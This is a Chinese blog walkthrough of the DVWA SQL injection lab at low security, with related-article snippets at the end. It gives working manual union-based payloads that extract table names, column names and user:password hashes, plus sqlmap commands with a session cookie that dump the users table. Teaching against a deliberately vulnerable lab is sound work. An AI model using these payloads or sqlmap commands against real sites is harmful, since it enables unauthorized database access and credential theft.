DVWA -SQL Injection (low)

最新推荐文章于 2024-03-19 16:41:37 发布
原创 最新推荐文章于 2024-03-19 16:41:37 发布 · 316 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了DVWA中SQL Injection(low)级别的手工注入和使用sqlmap工具进行注入的详细步骤。包括判断注入类型、猜测字段数、获取用户信息、表名、字段名和字段值等,并演示了sqlmap如何探测注入点、枚举数据库、表、列及转储数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

low级别(手工注入 和 sqlmap工具注入)
**

手动注入

**

1.判断是否存在注入,注入的类型是字符型还是数字型
输入1:(输入1-5都会返回正确的值)在这里插入图片描述
输入 1’(发现报错,存在注入漏洞)

在这里插入图片描述

Id是被’ ‘包括起来的,是属于字符型注入

闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值)
在这里插入图片描述
输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。

在这里插入图片描述

2.猜测sql查询语句中的字段数
1’ order by 3#
在这里插入图片描述
1’ order by 2#
在这里插入图片描述

3.确定显示的字段顺序

0’ union select 1,2#
在这里插入图片描述

4.获取当前用户,数据库,版本号
0’ union select 1,concat(user(),database(),version())#

在这里插入图片描述

5.获取表名
0’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
在这里插入图片描述
6.获取字段名
0’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
在这里插入图片描述

7.获取字段值
0’ union select 1,group_concat(user,0x3a,password) from users#
在这里插入图片描述
在这里插入图片描述
**

sqlmap工具注入

**

用到的参数
-u URL, --url=URL :指定URL
–cookie=COOKIE :HTTP Cookie header值
–dbs :枚举数据库管理系统数据库
–tables :枚举DBMS数据库中的表
–columns :枚举DBMS数据库表列
-D DB :要进行枚举的指定数据库名
-T TBL :DBMS数据库表枚举
-C COL :DBMS数据库表列枚举
–dump :z转储数据库表项

1.查看有无注入点
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
在这里插入图片描述
有一个302跳转,跳转到的是登录页面,所以这个时候需要用cookie进行会话维持,然后用burpsuite或者f12,找到cookie
在这里插入图片描述
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho”
在这里插入图片描述
在这里插入图片描述
存在注入

2.获取数据库名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” --dbs
在这里插入图片描述
3.获取dvwa数据库中表名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa --tables
在这里插入图片描述
4.获取dvwa数据库中users表中的字段名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --columns
在这里插入图片描述
5.获取user,password的值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users -C user,password --dump
在这里插入图片描述
6.获取所有字段值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --dump
在这里插入图片描述

DVWA--SQL注入(SQL Injection)--Low
JakeLin's Blog
06-15 492
SQL注入常规思路: 1、寻找注入点,可以通过 web 扫描工具实现 2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。 3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息) 4、可以通过获得的用户信息,寻找后台登录。 5、利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。 手工注入常规思路: 1.判断是否存在注入,注入是字符型还是...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3127
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA SQL Injection LOW
weixin_34008784的博客
11-26 216
最近在学习SQL注入,初出茅庐,就从dvwa开始吧 sql注入可以通过sqlmap工具实现,为了更好地了解原理,这里主要是手工注入 注入的一般流程为: 1,找到注入点,此步骤可通过工具 2,判断注入类型 3,判断列数,展示位 4,利用函数获取数据库用户,版本号,数据库名等信息 5,联合注入法利用information_schema数据库中存储所有的表...
DVWA——SQL Injection(low)
分享简单的安全技术
01-06 315
SQL Injection 界面 源代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWA——SQL Injection(LOW)
qq_54448882的博客
11-05 3430
此文章仅供学习使用,请勿用作违法行为。 目录 注入的前提条件 基本思路 1.判断是否存在注入点,以及注入的类型(字符型/数字型) 2.猜解SQL查询语句中的字段数和字段顺序 3.确定回显点 4.获取当前数据库 5.获取数据库中的表 6.获取表中字段名 7.获取字段中的数据(此时已可以成功获取数据库内容) 注入的前提条件: 参数用户可控:用户可以控制前端传入后端的参数内容 参数可带入数据库进行查询:用户传入的参数可以直接拼接到数据库的SQL语句,且带入数据库查询。 基本思路:
DVWA-SQL Injection(low)
七月_的博客
10-21 435
文章目录安装dvwa下载、安装PhpStudy下载、存放DVWA配置DVWA环境创建数据库出错成功登录LowSQL Injection:(1)判断(2)用order by判断列数(3)注入出当前数据库所有的表名(4)注入出某一个表中的全部列名(5)注入出字段内容low SQL Injection源码 安装dvwa 下载、安装PhpStudy 下载地址传送门:https://www.xp.cn/do...
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1761
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 704
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 454
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 956
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
【渗透测试】【Sqlmap】DVWA-SQL Injectionlow)
preserphy的博客
07-05 429
①进入sqlmap目录,使用-u命令访问地址:python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"发现跳转到302了,被重定向了,所以这样不行…又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。②使用--cookie命令加...
DVWA】1.SQL Injection通关记录(Low
Zichel77的博客
10-21 407
Security Level:Low 1.判断注入点及注入类型 看到的是一个输入框,输入数字有对应返回值 所以这里应该是一个注入点,使用恒真恒假式来尝试一下 输入1' and '1'='2返回无结果,确定此处为注入点 再用恒真式来显示所有结果 输入1' or '1'='1('1'='1'恒真,中间使用or连接则整个查询式子恒真,即可返回所有查询结果) 2.判断数据库中的字段数 ...
DVWA - SQL - Injectionlow
m0_62102000的博客
09-16 219
DVWA - SQL - Injectionlow
SQL injection on DVWA (Low Level)
312小公举的专栏
05-12 1189
首先看看输入正常的ID得到什么结果: 当输入1‘ 时: 说明了这个id的类型是个string,数据库是MySQL 当输入1’ and '1'='1时,and后面的1=1是个永真式: 当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果: 确定数据表的列数: 输入' union select 1,2 --'
SQL Injection——low低级别
用博客做做记录的小白
06-06 221
DVWA靶场sql注入关卡低级难度
DVWA sql injection low
weixin_43345082的博客
06-12 294
Dvwa Low 1 1’ 1 and 1=1 1 and 1=2 select First name的列名 and Surname的列名from 表名 where id的列名 =‘我们输入的id’ 那么我们首先爆出它的库试试,用单引号让id闭合 内置查询函数version()  user()  database()  @@version_compile_os 输入 1’ union select...
DVWA(7)SQL注入(SQL InjectionLOW-HIGHT 操作记录
lllllaaa111的博客
11-08 468
今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的。
小记一次DVWA靶场中SQL注入
ranuy阮的博客
02-25 862
0x01 环境介绍 DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x02 测试过程 low级别,关于mysql日志 查询是否启用日志 mysql>show variables like ‘log_%’; MySQL有以下几种日志: 错误日志: -log-err 查询日志: -log 慢查询日...
DVWASQL Injection
baynk的博客
10-29 1776
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
dvwa-http
最新发布
07-01
##### **SQL注入 (SQL Injection)** DVWA提供了不同安全级别的SQL注入漏洞,允许测试者尝试不同的注入技巧。例如,可以通过`UNION SELECT`来猜测字段数量并提取数据库信息 [^4]。 ```sql -- 示例:尝试登录绕过 ' ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值